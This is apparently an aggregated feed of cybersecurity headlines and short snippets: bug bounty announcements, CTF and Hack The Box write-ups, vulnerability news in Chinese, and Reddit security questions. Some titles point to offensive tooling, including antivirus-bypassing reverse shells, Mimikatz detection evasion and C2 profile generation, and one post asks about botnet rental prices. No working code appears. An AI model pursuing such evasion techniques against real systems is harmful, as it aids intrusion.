    Keep it short and sweet (as much as possible today anyway)… I’m gonna use some other stuff beyond just HTB: Academy. Been doing some… Continue reading on Medium »
    Neom, Attack Surface and Ransomware
    Neom is certainly setting out to wow the world with bold ideas and we have to wonder if some of the aspirations are achievable within the… Continue reading on Medium »
    Hats Bug Bounty Launches
    We’re excited to announce we’ve partnered with Hats Finance for our Bug Bounty. You can find the Jelly Vault on… Continue reading on Jelly »
    Archethic Bug Bounty Program
    Archethic blockchain is launching a bug bounty program find all the conditions to find some bugs and get rewared up to 10k$ Continue reading on Archethic »
    Nueva alerta de Bug Bounty: ¡Bienvenido Solace Finance!
    ¡Después de un emocionante anuncio de asociación, le damos la bienvenida a Solace Finance como la nueva bóveda de recompensas por errores… Continue reading on Medium »
  • Open

    How I Caught A Hacker
    Hello, respectful readers. One of my friends had an Udemy account and shared the account’s credential with some friends. But, one day my… Continue reading on Medium »
    BirdHunt. Chercher des tweets par localisation
    Continue reading on Medium »
    Exposing a Pretender using SocMed OSINT
    SocMed = Social Media OSINT = Open Source Intelligence Continue reading on Medium »
  • Open

    Introduction to Cyber Security
    As I said before, I am starting to write on cyber security issues, these articles will be as far from technical information as possible… Continue reading on Medium »
  • Open

    Searching for files in public MEGAs / Google Drives
    Are there any ways to search for a filename across all publicly available MEGAs or google drive folders? Any help would be much appreciated submitted by /u/adzboy9 [link] [comments]
    Lots of stuff in here music sorted by artist, videos, programs etc
    http://65.186.78.52/ submitted by /u/Akhenaten1049 [link] [comments]
  • Open

    A Deep Dive Into Black Basta Ransomware
    submitted by /u/CyberMasterV [link] [comments]
    Threat Hunting Hypothesis: Creating Multiple Types of Hypotheses With Examples
    submitted by /u/Successful_Mix_8988 [link] [comments]
  • Open

    Several powerful primitives for exploiting the macOS kernel may never get fixed
    submitted by /u/gaasedelen [link] [comments]
    Spammers use Google Translate to bypass Domain-Blacklists
    submitted by /u/ma-ni [link] [comments]
    Return to Sender - Detecting Kernel Exploits with eBPF
    submitted by /u/thorn42 [link] [comments]
    Wheel of Fortune Outcome Prediction – Taking the Luck out of Gambling
    submitted by /u/digicat [link] [comments]
  • Open

    Let's Dance in the Cache - Destabilizing Hash Table on Microsoft IIS!
    No content preview
  • Open

    SecWiki News 2022-08-17 Review
    科研与英文学术论文写作 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-08-17 Review
    科研与英文学术论文写作 by ourren 更多最新文章,请访问SecWiki
  • Open

    Using Kubernetes Plugins for Better Security
    No content preview
    PortSwigger Web Security Academy Lab: SQL injection UNION attack, retrieving multiple values in a…
    No content preview
  • Open

    Using Kubernetes Plugins for Better Security
    No content preview
    PortSwigger Web Security Academy Lab: SQL injection UNION attack, retrieving multiple values in a…
    No content preview
  • Open

    Using Kubernetes Plugins for Better Security
    No content preview
    PortSwigger Web Security Academy Lab: SQL injection UNION attack, retrieving multiple values in a…
    No content preview
  • Open

    Cross Site Scripting Vulnerability in fabric-sdk-py source code
    Hyperledger disclosed a bug submitted by bhaskar_ram: https://hackerone.com/reports/1670187
  • Open

    云畅游戏张洪洋:在安全的道路上,脚踏实地,抬头看天 | TTSP安全智库专家访谈
    FreeBuf有幸邀请张洪洋进行专访,聊聊他在安全之路上经历的故事,也期望能给刚进入安全行业的从业者一些启发和思考。
    FreeBuf早报 | 卡巴斯基实验室开发防黑客手机;微软为 Mac 推出篡改保护
    据俄罗斯卫星社报道,近期卡巴斯基实验室总裁表示,该实验室正在开发自主品牌手机的防黑客入侵功能。
    【招纳贤士】安全研发+研究类(社招)岗| base深圳上海北京
    腾讯安全科恩实验室招聘安全人员。
    《网络安全标准实践指南——健康码防伪技术指南(征求意见稿)》发布
    《指南》依据有关政策法规要求,做好支撑疫情防控工作,防止健康码伪造安全风险,对健康码防伪提供技术实践参考。
    一种新型攻击技术出现,可将PLC武器化
    该技术的巧妙之处在于,可将可编程逻辑控制器 ( PLC ) 武器化,以在工程工作站中获得初步立足点,随后入侵运营技术 (OT) 网络。
    混合钓鱼攻击在第二季度飙升625%
    混合网络钓鱼威胁是多阶段攻击,与传统网络钓鱼不同。
    Realtek爆出关键漏洞,影响多款网络设备
    CVE-2022-27255漏洞影响到数百万台采用 Realtek RTL819x 系统芯片(SoC)的网络设备。
    CS:GO 交易网站被黑,价值 600 万美元皮肤被盗
    著名射击游戏CS:GO最大的皮肤交易平台之一——CS.MONEY在一次黑客攻击后被窃取了2万件、总价值约 600万美元的游戏皮肤。
    FreeBuf咨询服务 | 企业安全意识教育,让“网安周”永久在线
    网络安全已经成为工作学习不可缺少的一部分。
  • Open

    AdobeReader 逻辑漏洞分享 (CVE-2021-21037)
    作者: 360漏洞研究院 王志远 原文链接:https://vul.360.net/archives/503 背景 我们在第三届“天府杯”国际网络安全大赛中成功完成AdobeReader RCE项目,这篇文章将会详细介绍其中使用到的2个逻辑漏洞:长达15年之久的DLL加载漏洞与随机数转换逻辑漏洞,漏洞编号为CVE-2021-21037。 DLL加载逻辑漏洞分析 我们在挖掘AdobeReade...
  • Open

    AdobeReader 逻辑漏洞分享 (CVE-2021-21037)
    作者: 360漏洞研究院 王志远 原文链接:https://vul.360.net/archives/503 背景 我们在第三届“天府杯”国际网络安全大赛中成功完成AdobeReader RCE项目,这篇文章将会详细介绍其中使用到的2个逻辑漏洞:长达15年之久的DLL加载漏洞与随机数转换逻辑漏洞,漏洞编号为CVE-2021-21037。 DLL加载逻辑漏洞分析 我们在挖掘AdobeReade...

  • Open

    Want to learn cyber security
    Greetings. I'm wondering if it's possible to get into the cyber security field without a degree. I'm in my early 40's and I hate my blue collar career. I've always loved IT stuff and have been very good at it. I just never focussed on my school studies in the past (due to late diagnosis of ADHD). I did take some courses way back when I was laid off such as A+ and Network+ which I thought myself and had certifications for (now long expired) I know I could do well with this but I'm wondering since I'm older, that it might be too late to follow this dream. I can't go to school full time since I work full time. Something along the lines of ethical hacking sounds interesting to me. Is it possible to learn on my own and get into a cyber security career? Where should I start and what certifications would I need? Any tips or advice from any one that's been in a similar situation? I'm in Canada if country makes a difference. Thanks! submitted by /u/Darth_Rayzor [link] [comments]
    Can I be infected by copying a bad file?
    I copy a potential malicious file and paste in a sandbox. Am I going to get infected by the copying file in say a email? How else could I get it to a sandbox submitted by /u/papervault [link] [comments]
    please explain the risk. vpn blocked from remote computer.
    I'm not sure if this is the right place to ask the question, sorry if its not. Its my works new policy that a computer cannot have a vpn connection into the office from a computer being accessed remotely. example: I have WorkPC in my closet, its got lots of ram, cpu, and i only install work apps on it. I have my HomePC that i use for most things that is mine, and i have nice multimonitor setup to go with it. I used to sit at HomePC, and remote desktop to WorkPC to do my work (both in my local network) but to do the work, once i'm connected to WorkPC, i connect WorkPC's vpn into work so i can checkout licenses and stuff. This is as of today blocked, so now i have to figure out how to move all my computers around to be able to get any work done. What is the threat they are trying to prevent? is it a realistic one? (how annoyed should i be right now?) any ideas how i should have my pcs setup? I also wanted the flexibility to connect to WorkPC from a laptop so i could do work from any location in my house, but this seems to break that too... it seems like my only solution is a work laptop + KVM switch + annoyance? Thanks. submitted by /u/rLarc [link] [comments]
    Getting more and more emails about suspicious activity on various accounts?
    It all started last week with Ubisoft and then a few days apart I keep getting the same thing from Microsoft, Mega and PayPal. I haven't clicked on any suspicious links and I do use a VPN only for a particular website, but never the ones I mentioned earlier and I haven't gotten on them in months. I checked my email address in https://haveibeenpwned.com and it was found in 5 breaches, so I guess I'm waiting for a 5th email telling me one of my accounts encountered suspicious activity. Right now I'm taking all safety precautions and changing my passwords and enabling Two-Factor Authentication where possible. But I'm still wondering why this is happening? submitted by /u/throacco19 [link] [comments]
  • Open

    IDOR on TikTok Seller
    TikTok disclosed a bug submitted by aidilarf_2000: https://hackerone.com/reports/1509057 - Bounty: $500
    CSRF Account Takeover
    TikTok disclosed a bug submitted by s3c: https://hackerone.com/reports/1253462 - Bounty: $2373
    IDOR allowing to read another user's token on the Social Media Ads service
    Semrush disclosed a bug submitted by a_d_a_m: https://hackerone.com/reports/1464168 - Bounty: $2000
  • Open

    From Hunted to Hunter
    Please note: this article contains potentially triggering stories about child sexual abuse Continue reading on Medium »
    L’espion Challange || CyberDefenders
    Hello Guys This is Abdelrahman Attia today we will solve L’espion Challange From Cyber Defenders Continue reading on Medium »
  • Open

    StepSecurity releases tool that it used to improve security of 30 critical open-source projects…
    No content preview
    PortSwigger Web Security Academy Lab: SQL injection UNION attack, retrieving data from other tables
    No content preview
    How To Hack With SQL Injection Attacks! DVWA low security — StackZero
    No content preview
    IW Weekly #16: AWS Vulnerability, Threat Hunting, Reflected XSS, Pentesting Resource, Command…
    No content preview
  • Open

    StepSecurity releases tool that it used to improve security of 30 critical open-source projects…
    No content preview
    PortSwigger Web Security Academy Lab: SQL injection UNION attack, retrieving data from other tables
    No content preview
    How To Hack With SQL Injection Attacks! DVWA low security — StackZero
    No content preview
    IW Weekly #16: AWS Vulnerability, Threat Hunting, Reflected XSS, Pentesting Resource, Command…
    No content preview
  • Open

    StepSecurity releases tool that it used to improve security of 30 critical open-source projects…
    No content preview
    PortSwigger Web Security Academy Lab: SQL injection UNION attack, retrieving data from other tables
    No content preview
    How To Hack With SQL Injection Attacks! DVWA low security — StackZero
    No content preview
    IW Weekly #16: AWS Vulnerability, Threat Hunting, Reflected XSS, Pentesting Resource, Command…
    No content preview
  • Open

    Disrupting SEABORGIUM’s ongoing phishing operations
    submitted by /u/SCI_Rusher [link] [comments]
    I will Live create a POC for CVE-2022-26923
    Tomorrow (08.17, at 20:00 EEST) I will stream How I Develop a POC for CVE-2022-26923 on my Twitch: https://www.twitch.tv/lsecqt ​ Feel welcomed guys! submitted by /u/lsecqt [link] [comments]
  • Open

    Disrupting SEABORGIUM’s ongoing phishing operations
    submitted by /u/SCI_Rusher [link] [comments]
    A Deep Dive Into Black Basta Ransomware
    submitted by /u/CyberMasterV [link] [comments]
    SOVA malware is back and is evolving rapidly
    submitted by /u/Frank538 [link] [comments]
  • Open

    My Recon Tools
    Hello Amazing People, Continue reading on System Weakness »
    DOM XSS ON A GOV DOMAIN BYPASSING WAF
    Welcome back readers. I hope everyone is doing well. I have decided to do a writeup on a DOM Based XSS I recently found bypassing WAF… Continue reading on Medium »
    Cross-Site Scripting (XSS) Attacks
    Cross-site scripting (often shortened to XSS) is a common security vulnerability that is more prevalent in web applications. Continue reading on Medium »
    Monitoring Linux host metrics with the Node Exporter information disclosure $350
    Censys Continue reading on Medium »
    Apache Rootkits RCE
    penulisa: lalualowan Continue reading on Medium »
    Interview: The XSS Rat
    Bug bounty hunter, Teacher and Father Continue reading on Medium »
    IW Weekly #16: AWS Vulnerability, Threat Hunting, Reflected XSS, Pentesting Resource, Command…
    Hey 👋 Continue reading on InfoSec Write-ups »
  • Open

    SecWiki News 2022-08-16 Review
    [HTB] Antique Writeup by 0x584a 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-08-16 Review
    [HTB] Antique Writeup by 0x584a 更多最新文章,请访问SecWiki
  • Open

    Multiple cloud vendors impacted by PostgreSQL vulnerability that exposed
    Article URL: https://portswigger.net/daily-swig/multiple-cloud-vendors-impacted-by-postgresql-vulnerability-that-exposed-enterprise-databases Comments URL: https://news.ycombinator.com/item?id=32483937 Points: 1 # Comments: 0
  • Open

    Things you can find in RAM that are useful in investigations.
    submitted by /u/DFIRScience [link] [comments]
    The Hitchhiker's Guide to DFIR: From Beginners and Experts
    I'm very excited to share the first edition of, what's been in the works for almost 5 months now, "The Hitchhiker's Guide to DFIR"; a project started by Andrew Rathbun as a proof of concept for a crowdsourced and opensource approach to publishing. The idea was simply to gather a bunch of people willing to write a chapter of their own choosing covering their stories, knowledge or experiences within the domain of DFIR. V1 contains chapters from some well-known forensicators as you might already know them. You can also find my chapter indexed 8th and titled "Artifacts as Evidence" where I share some of the artifacts that I encountered in the wild. What began as a fun and collaborative project, has now resulted in this small DFIR book. I hope it sparks the interest of beginners, helps the practitioners and is refreshing for the professionals! Note: This is a free distribution, you don't have to pay anything on the Leanpub landing page. Hitchhiker's Guide to… by Andrew Rathbun et al. [PDF/iPad/Kindle] (leanpub.com) submitted by /u/Nisarg12 [link] [comments]
  • Open

    family bible records
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    You. Are. Welcome. 🤗
    submitted by /u/ManaHoney504 [link] [comments]
    Various Music
    https://www.7xr.nl/Music/ ​ There's also https://www.7xr.nl/games/ for games submitted by /u/neheb [link] [comments]
    Index of /Files/
    submitted by /u/taramj13 [link] [comments]
  • Open

    FreeBuf早报 | “抄家”特朗普后网络威胁激增;抖音上线溯源等功能治理不实信息
    联邦调查局发出警告,自上周FBI在佛罗里达州突袭搜查前总统唐纳德·特朗普位于海湖庄园的住宅后,针对执法官员的网络威胁激增。
    macOS上的漏洞可能让攻击者访问Mac上的所有文件
    安全研究人员发现一个与macOS处理系统软件更新有关的注入漏洞可能会让攻击者访问Mac设备上的所有文件。
    新的 PyPI 包提供无文件 Linux 恶意软件
    Sonatype 研究人员发现了一个名为“secretslib”的新 PyPI 包,旨在将无文件加密矿工投放到 Linux 机器系统的内存中。
  • Open

    南亚 Patchwork APT 组织新活动特点分析
    作者:知道创宇404实验室APT高级威胁情报团队,K &Nan 1. 概述 Patchwork是自2015年12月以来一直活跃的南亚APT组织。该组织长期针对中国、巴基斯坦等南亚地区国家的政府、医疗、科研等领域进行网络攻击窃密活动。PatchWorkAPT是一个比较有意思的名字,源于该组织武器库是基于开源的代码拼凑而成(地下论坛、暗网、github等等)。知道创宇404实验室APT高...
  • Open

    南亚 Patchwork APT 组织新活动特点分析
    作者:知道创宇404实验室APT高级威胁情报团队,K &Nan 1. 概述 Patchwork是自2015年12月以来一直活跃的南亚APT组织。该组织长期针对中国、巴基斯坦等南亚地区国家的政府、医疗、科研等领域进行网络攻击窃密活动。PatchWorkAPT是一个比较有意思的名字,源于该组织武器库是基于开源的代码拼凑而成(地下论坛、暗网、github等等)。知道创宇404实验室APT高...

  • Open

    Want to LEAVE Pentesting
    FYI - crosspost to get more opinions Hi all - I know usually the posts are "I want to get into pentesting". I have the opposite predicament. I'm a internal OT/IT Pentester. I perform assessments on pretty much everything. SCADA, DCS, Web Apps, Authentication systems, Network, Active Directory, you name it. I've been doing this for about a year now and can see myself doing it for maybe 1 more year. Responsibilities other than pentesting: Purple team engagements with SOC build out red team infrastructure for testing exploits/TTPs Python, PowerShell, bash scripting/automation for tooling/workflows Reasons I'd like to leave: I travel about 6-7 times a year. I have a good balance and although I'm young - I prefer a role that is more structured and eventually I would prefer to tra…
    How does the periodic cyber security report should look like?
    Hi, I have been asked by our company’s head of cybersecurity to prepare monthly report related to cybersecurity technologies. What things report should contain? Can anyone share the suggestions or sample report? submitted by /u/techno_it [link] [comments]
    Confused on what point to begin learning
    How much code/what languages should I know beforehand before indulging in learning hacking methods, Red/Blue strategies and try to get certified in Cybersecurity to be able to breeze by and not struggle as much in comparison to not knowing and coding skills? submitted by /u/fawzi97 [link] [comments]
    Can tik tok on Android access my MFA code in Authy or Google Authenticator?
    I've read some really bad articles saying that Tik Tok is overly permissive on Android. Could tik Tok in theory access the MFA codes on my phone if I scanned the QR codes to add them into either Authy or Google Authenticator before I installed Tik Tok? submitted by /u/cryptocritical9001 [link] [comments]
    How many goals does symmetric and asymmetric encryption achieves?
    Authentication Integrity Non-Repudiation Confidentiality Is my question even correct? Because I'm seeing lots of books are saying symmetric encryption can't provide non-repudation. So, can we generalize for all symmetric cryptography? And what about asymmetric? Does it achieves all goals? submitted by /u/syavage [link] [comments]
    Data Security and Privacy: Using a Dedicated Proxy Server and NordVPN
    r/AskNetsec As the title says, I'm trying to get the most secure and fastest connection possible. I work in the financial services industry and stream in my off-time so I have a couple of questions about online privacy and security. ​ Is there a benefit of using BOTH a dedicated proxy server and VPN at the same time? In my mind, the proxy server hide my IP address, then the VPN both hides the proxy IP address and encrypts the data. I set up my dedicated proxy server through Windows 10 directly. No issues whatsoever. If this the best and most secure method? I have 5 dedicated proxy servers and only using one that's managed by Windows 10? Several apps are set up through NordVPN with tunneling and a killswitch including Tor, Signal, OBS, and several other apps. When I try this with Google Chrome all while using my proxy server, it doesn't connect to the internet? Is there a fix for this? Should be noted, I'm able to use and connect to the internet through Chrome using my proxy server if I'm using the NordVPN Chrome extension - but the tunneling and kill switch isn't in place? Is there a fix for this? ​ The most secure way of browsing the internet is obviously using Tor with my proxy and VPN, but are there any other methods of increasing my privacy and security outside of using a dedicated proxy server and VPN at the same time? I'm open to suggestions of any sort. submitted by /u/fletchketchem [link] [comments]
    Availability and pricing of Botnets (Botnet-as-a-Service)
    Hi r/AskNetsec! I'm preparing myself for presentation regarding bots and botnets. I will be talking about types of bots like good bots, bad bots, and what they can do, how you can protect yourself againts them, some information about popular botnets that were used in recent years, how IoT devices are insecure and can be used to attack (Miraibot example), etc. One of my talking points is how in the recent years the prices of renting servers and services went down which makes creating botnets more affordable than ever. I wanted to provide some examples with pricing but this is where i stumbled into a wall. I've looked over more popular underground marketplaces and found only offers for buying bots to create your own botnet, training materials on how to create botnets, services for generating likes, subscribers or discord bots or DDoS. Nothing related to renting botnets infrastructure for attacks like spamming, credential stuffing, ransomware, password bruteforcing, etc. During my research I've found some articles regarding this topic, but they are pretty old and the prices themselves are all over the place. https://www.zdnet.com/article/study-finds-the-average-price-for-renting-a-botnet/ https://www.secplicity.org/2017/03/07/know-much-costs-rent-iot-botnet/ https://datadome.co/learning-center/what-is-ddos-booter-botnet-booter/ My kind question to You all is if you could provide me with some info on the pricing or screenshots of the offers if you have seen any recently? Direct links are most likely againts this subreddit rules, so only price and botnet type info and for screenshots the seller and any other details that could point to the particular marketplace/seller can be blurred. Thanks! submitted by /u/vlot321 [link] [comments]
  • Open

    Process Behaviour Anomaly Detection Using eBPF and Unsupervised-Learning Autoencoders
    submitted by /u/sanitybit [link] [comments]
    Tracking Internet facing Industrial Control System devices
    submitted by /u/Mysterii8 [link] [comments]
    Why Action Bias Is Damaging Your Security Response
    submitted by /u/mesok8 [link] [comments]
    EvilPLC Attack: Using a PLC to Gain Code Execution on Engineering Workstation
    submitted by /u/derp6996 [link] [comments]
    Attacking Google's Titan M Security Key with Only One Byte
    submitted by /u/sanitybit [link] [comments]
    HijackLibs: an open-source, community-driven project tracking DLL Hijacking opportunities in in Windows
    submitted by /u/sanitybit [link] [comments]
    STrace: MIT Licensed Windows Reimplementation of DTrace
    submitted by /u/sanitybit [link] [comments]
    NthLink VPN found to be regular shadowsocks using same pre-shared keys for all users
    submitted by /u/yarmak [link] [comments]
  • Open

    HacktheBox [Devzat]
    Devzat was a Medium ranked box on the HacktheBox platform involving heavy enumeration. The initial foothold is gained by identifying a… Continue reading on Medium »
    HacktheBox[Meta]
    Meta was a medium machine on HacktheBox. By identifying an additional virtual host, the user is able to find an API running exiftool… Continue reading on Medium »
    HoaxShell — Reverse Shell
    HoaxShell é uma ferramentas desenvolvida em Python que gera payloads capaz de realizar o bypass no Windows Defender e em outros Antivírus… Continue reading on 100security »
    CRTP Review
    TLDR; Continue reading on Medium »
    eLearnSecurity Penetration Testing Professional ( eCPPT ) Review
    eCPPT/PTP Writeup Continue reading on Medium »
  • Open

    New Bug Bounty Alert: Welcome Solace Finance!
    After an exciting partnership announcement, we welcome Solace Finance as the newest bug bounty vault! Continue reading on Medium »
    Vega Bug Bounties
    Starting today, Monday 15th of August 2022, the Vega Protocol is officially launching the Vega Bug Bounty Program! Continue reading on Vega Protocol »
    FFUF Tool 9 tips, File Inclusion Guide, Code Injection Guide | MONDAY HACKING | BotAmi | EPISODE…
    Hello, Hackers 👋👋 Continue reading on Medium »
    How to **actually** use Amass more effectively — Bug Bounty
    99% of bug hunters only use 1% of Amass’ potential… Continue reading on Medium »
    Salesforce bug hunting to Critical bug
    Or how I learned that some bugs are truly rare Continue reading on InfoSec Write-ups »
    SQL Injection
    In this section, I’ll explain what SQL injection is, describe some common examples, explain how to find and exploit various kinds of SQL… Continue reading on Medium »
    Business Logic Vulnerability via IDOR
    Exploiting a Logic Vuln via IDOR. #Bugbounty Continue reading on Medium »
  • Open

    CHFI v 10 new topics
    i bought the course for CHFI v9 from ec council a while ago and delayed writing the exam till now, now the exam is based on v10 and i know most of the content is same but the 2 new added modules are missing IoT Forensics , Dark Web Forensics. anyone know of any good resources where i can read about these topics myself. any help would be much appreciated, thank you submitted by /u/Top-Law8118 [link] [comments]
    Demonstrating Basic Computing Knowledge
    I have the opportunity to apply for a digital forensics position that will train. There is no digits forensic experience required. That being said, it is very competitive. If I wanted to gain some tangible skills to demonstrate I have some knowledge of computing, would you recommend getting CompTIA A+, S+, N+? Any others? I know these do not necessarily correlate directly with digital forensics. submitted by /u/invictusliber [link] [comments]
  • Open

    Giving away some wireless gear (alfa cards, d-links) to two people
    Hey r/ExploitDev - I was clearing out some things from my office this weekend and came across two Alfa 802.11b/g wireless cards and two DIR-601s. I used these a while back when I was doing the OSWP labs. [Timestamp](https://i.imgur.com/SvQhRyn.jpg) I spoke with the mods and they are cool with me doing a giveaway raffle for these. There is nothing fancy about the routers or the alfa cards (they are both old commodity hardware) but could be beneficial if you are looking to take the OSWP or starting to study the basics of 802.11 attacks. Raffle Terms: Comment to enter RedditRaffler will be used to select two winners approximately 24 hours from now I'll contact the winners via DM and ship you one Alfa card and DIR-601 "kit" seen in the above timestamp. I'll pay for the shipping costs. CONUS-Only shipping Minimum account age is 30 days Thanks! submitted by /u/Bowserjklol [link] [comments]
  • Open

    Update Zoom for Mac now to avoid root-access vulnerability
    Article URL: https://arstechnica.com/information-technology/2022/08/zoom-patches-mac-auto-updater-vulnerability-that-granted-root-access/ Comments URL: https://news.ycombinator.com/item?id=32472030 Points: 14 # Comments: 2
  • Open

    SecWiki News 2022-08-15 Review
    【自动化赏金之路】初试3个月 收入10000块的总结 by BaCde SecWiki周刊(第441期) by ourren ModSecurity 自建规则之路 by SecIN社区 SANS 2022 年威胁狩猎调查报告 by Avenger 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-08-15 Review
    【自动化赏金之路】初试3个月 收入10000块的总结 by BaCde SecWiki周刊(第441期) by ourren ModSecurity 自建规则之路 by SecIN社区 SANS 2022 年威胁狩猎调查报告 by Avenger 更多最新文章,请访问SecWiki
  • Open

    FreeBuf早报 | 网信办公布微信淘宝抖音等算法备案;两款红米手机被曝存在安全漏洞
    国家网信办公开发布了境内互联网信息服务算法名称及备案编号,包括多个大型企业和产品的相关算法。。
    Black Hat 2022 | 三大趋势已成世界定局
    Black Hat被公认为“黑客界的奥斯卡”,着眼于当下实际的安全态势,分享前沿的安全研究、安全产品和解决方案。
    Black Hat 2022公布14大研究新发现
    PCMag选出了本届大会上14个重磅研究成果,让我们通过本文来一一窥探。
    CISA、FBI 发布联合公告,警告 Zeppelin 勒索软件攻击
    Zeppelin 勒索软件于2019 年11月首次出现在威胁领域。
    竟然不设密码!调查发现全球超9000台VNC 服务器存暴露风险
    在黑客论坛上,通过暴露或破解的VNC访问关键网络的需求很高,在某些情况下,这种访问可以用于更深层次的网络渗透。
    美国制裁加密货币混合,Tornado Cash员工遭逮捕
    荷兰有关当局宣布,美国在阿姆斯特丹逮捕了一名加密货币混合器工作的软件开发人员。
    Killnet黑客组织声称已“攻破”洛克希德-马丁公司
    《莫斯科时报》披露,黑客组织 Killnet 声称对航空航天和国防巨头洛克希德-马丁公司发动了一次大规模 DDoS 攻击。
    因收集Android 位置数据,Google被罚六千万美元
    澳大利亚公平竞争和消费者委员会称,谷歌因收集数据时误导用户,被处以6000万澳元(约合人民币2.88亿元)罚款。
  • Open

    Salesforce bug hunting to Critical bug
    Or how I learned that some bugs are truly rare Continue reading on InfoSec Write-ups »
    Irremovable guest in facebook event — Facebook bug bounty
    No content preview
    PortSwigger Web Security Academy Lab: SQL injection UNION attack, finding a column containing text
    No content preview
  • Open

    Salesforce bug hunting to Critical bug
    Or how I learned that some bugs are truly rare Continue reading on InfoSec Write-ups »
    Irremovable guest in facebook event — Facebook bug bounty
    No content preview
    PortSwigger Web Security Academy Lab: SQL injection UNION attack, finding a column containing text
    No content preview
  • Open

    Salesforce bug hunting to Critical bug
    Or how I learned that some bugs are truly rare Continue reading on InfoSec Write-ups »
    Irremovable guest in facebook event — Facebook bug bounty
    No content preview
    PortSwigger Web Security Academy Lab: SQL injection UNION attack, finding a column containing text
    No content preview
  • Open

    ConINT 2020 and CTF in Five Swinging Iced Girrafes!
    OK so here goes! The first of my throwback sessions! Let’s go back to the weekend of 17th October 2020! Continue reading on Fitness Drinking Security Code »
  • Open

    Burp2Malleable - turn HTTP requests into MalleableC2 profiles
    submitted by /u/CodeXTF2 [link] [comments]
  • Open

    Mega Cooking Recipe "open" dir - looking for possible ways to get this downloaded
    http://www.justbeefrecipes.com - plus 18 more websites, all accessible via the top bar. 91.3K recipes across all sites. Plain text, no images, basically a somewhat fancy opendir. Important to note that these sites only allow 200 requests per IP per day, however this is on a per-site basis. I stumbled across this while looking for more sources to put in version 2 of my cooking recipe archive. However, the aforementioned limit of 200 files per day is not at all ideal. wget and other utilities will carry on downloading after the limit, however the files downloaded will, instead of recipe content, contain an error mentioning this limit. I have a VPN that I can switch IPs with, which works fine, but the real issue is getting these download utilities to pick up where they left off. I haven't yet found a way to force wget or curl to pause downloading after 200 files, and let me switch IPs. This would also get pretty tedious very quickly - 91K recipes means around 455 manual IP switches in all (assuming no cross-site IP usage). ​ So I'm curious - has anyone else run into a site like this, and found a way to download it in an efficient manner? submitted by /u/WAUthethird [link] [comments]

  • Open

    Evade Windows Defender Mimikatz detection by patching the amsi.dll
    submitted by /u/sanitybit [link] [comments]
    DC30 Mainframe Buffer Overflow workshop. This docker container has everything you need to learn how to do MVS buffer overflows.
    submitted by /u/sanitybit [link] [comments]
    Process injection: breaking all macOS security layers with a single vulnerability
    submitted by /u/sanitybit [link] [comments]
    wtfis - A commandline tool that gathers information about a domain or FQDN using various OSINT services and displays them formatted for human consumption.
    submitted by /u/sanitybit [link] [comments]
    From Oscilloscope to Wireshark
    submitted by /u/sanitybit [link] [comments]
    Hacking Zyxel IP cameras to gain a root shell
    submitted by /u/hydrogen18 [link] [comments]
    Threatest, a Go framework for end to end testing threat detection rules
    submitted by /u/thorn42 [link] [comments]
  • Open

    nuclear power documents
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Tonic
    submitted by /u/Plastic_Preparation1 [link] [comments]
    Quite a few movies in 720p mp4 format, mostly from 2016-17
    submitted by /u/draebor [link] [comments]
    Grabbing files from Google Drive
    Looked over the posts and here and not finding what I am looking for. Is there an easier way to grab files from Google Drive other waiting for the files to zip and then download? submitted by /u/belly_hole_fire [link] [comments]
  • Open

    If proxychain is not encrypted why is it used
    can its protocols be changed submitted by /u/Iam_really_need_name [link] [comments]
    Best certification/courses for network security?
    Looking for the best courses/certs to get to improve my network security skills. Things similar to monitoring packets for malicious activity like DNS beaconing, investigating firewall IDS/IPS events, NGFW configuration, best practices, etc. submitted by /u/Professional-Dork26 [link] [comments]
    Building a Home Lab
    Hey everybody. Currently I am trying to set up a virtual environment so that I can practice on it. I do have a couple of questions though. How would you guys recommend setting up a homelab? I use Fedora as my daily driver and then I have a Kali vm installed with KVM/Qemu via Virt-Manager. My initial plan was to whip up a Windows 10 vm in Virtualbox on my spare mac and then attack it with my Kali machine. I was going to set up the Windows box as 'Host-Only' so that it is isolated. But all the research and videos I have watched only show how to set up a 'Host-Only' network between two virtual machines on the same host computer. Is it possible to set up the scenario that I am describing? To isolate a windows machine on virtualbox and attack it on my other computer using virt-manager? I am under the impression that my 'vulnerable' box should be on the Host Only network mode just for security reasons. But if that is the case, how would I connect to it to attack it? I am pretty sure that what I am describing makes sense but if it turns out that I am wrong and it doesn't, I do apologize! I haven't been on my ethical hacking journey for very long so I am sorry if this is a dumb question or if it has a very simple answer. Thanks! TL;DR: How to isolate a Windows vm on virtualbox within my Mac OS Host and be able to attack it via my Kali machine via Virt-Manager on my Linux host. ​ P.S. Sorry if this isn't the right sub - I tried posting in an ethical hacking and cybersecurity sub but the first one hasn't gotten any replies and the latter deleted my post. Just trying to get some information on this so I can practice. submitted by /u/strings_on_a_hoodie [link] [comments]
    How likely is it to catch a virus nowadays, assuming a standard, up-to-date antivirus?
    I assume many people don't necessarily follow best practices in the digital world - download and run executables from dubious websites, for example. I wonder how prevalent is it for them to catch malware nowadays, provided they have a standard, up-to-date antivirus. Does most widespread malware exploit zero-day attacks and become detected by antiviruses after a few hours/days? How prevalent is more sophisticated malware that can stay undetected for weeks/months? Specifically, How hard is it for attackers to devise keyloggers and ransomware? submitted by /u/Curious-Brain2781 [link] [comments]
    Help me take a step forward in my career
    I’m a software dev with a some years of experience. I’ve always worked for security companies and on security products, so I have lots of exposure to the industry. I find that I like security way more than I like writing code. I’d like to make it my full time job. However, financially I can’t go back to square 1. I am looking for advice on how I can pivot to a true security career while not losing all of the seniority that I’ve built up. I think that security engineer is a logical spot to jump to, but I’m unsure. I am also curious if there are certs that I should pursue. My company will pay for them, but many seem to be either focused on red team (OSCP) or management (CISSP). submitted by /u/Weary_Drummer2211 [link] [comments]
  • Open

    Win NTFS image question
    I have an image of an HD from a 1 year old Dell desktop. It appears to be a windows NTFS but there are no users folders, many other typical windows folders are missing. The drive only has 9.5 GB of data out of 1TB. It is not zeroed, and the image is obviously not bootable. Trying to figure out what could have happened. submitted by /u/SquareEastern4454 [link] [comments]
    INDUSTRIAL SSD, 256GB, MLC,
    submitted by /u/Simply4U2bu [link] [comments]
  • Open

    From Open Redirect to Reflected XSS manually
    # For the purpose of this write-up, and the integrity of the company, we’ll consider that the target we’re testing is: >… Continue reading on Medium »
    Internal Bug Bounty’s & The Importance of Timing
    Read Time: 3 minutes Continue reading on Medium »
    Step 18: Information Gathering — Web Edition
